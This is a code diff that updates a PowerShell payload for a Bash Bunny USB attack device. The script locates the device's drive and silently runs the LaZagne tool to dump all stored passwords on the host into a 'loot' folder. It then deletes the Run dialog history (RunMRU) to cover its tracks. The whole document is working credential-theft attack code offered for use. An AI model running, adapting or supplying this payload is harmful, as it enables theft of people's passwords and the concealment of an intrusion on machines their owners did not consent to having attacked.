updated payload.ps1

payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1

@@ -1,6 +1,23 @@
-$drivelabel = 'BashBunny'
+$drivelabel = 'BashBunny'
-$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
+$volume = Get-WmiObject win32_volume -Filter "label='$drivelabel'"
-$filter = 'password_'+ $env:COMPUTERNAME
+
-$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
+if ($volume) {
-Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
+    $dest = $volume.Name + 'loot\PasswordGrabber'
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+    $filter = 'password_' + $env:COMPUTERNAME
+    $filecount = ((Get-ChildItem -Filter ($filter + "*") -Path $dest | Measure-Object).Count + 1)
+    
+    $toolPath = $volume.Name + 'tooling\LaZagne.exe'
+    if (Test-Path $toolPath) {
+        Start-Process -WindowStyle Hidden -FilePath $toolPath -ArgumentList 'all -vv' `
+            -RedirectStandardOutput ($dest + '\' + $filter + '_' + $filecount + '.txt')
+    } else {
+        Write-Error "LaZagne.exe not found at: $toolPath"
+        exit 1
+    }
+
+    Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' `
+        -Name '*' -ErrorAction SilentlyContinue
+} else {
+    Write-Error "Drive labeled '$drivelabel' not found."
+    exit 1
+}